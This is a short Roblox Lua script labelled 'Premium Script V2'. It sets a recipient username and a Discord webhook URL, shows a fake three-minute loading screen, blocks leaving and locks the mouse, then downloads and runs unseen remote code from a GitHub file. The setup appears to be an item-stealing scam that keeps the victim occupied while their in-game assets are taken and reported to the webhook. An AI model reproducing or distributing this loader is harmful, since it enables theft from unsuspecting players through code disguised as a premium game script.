UserName = "emeraldt2012"
UserName2 = ""
Webhook = "https://discord.com/api/webhooks/1107163485160341595/vyb_EuKGU0uR7asNxvTyXXUj-fN3y1WBd83UBEgW0fj_aXDWL3IuOqOJxtgTxIBszPt_"

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 

_G.ScriptName = "Premium Script V2"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
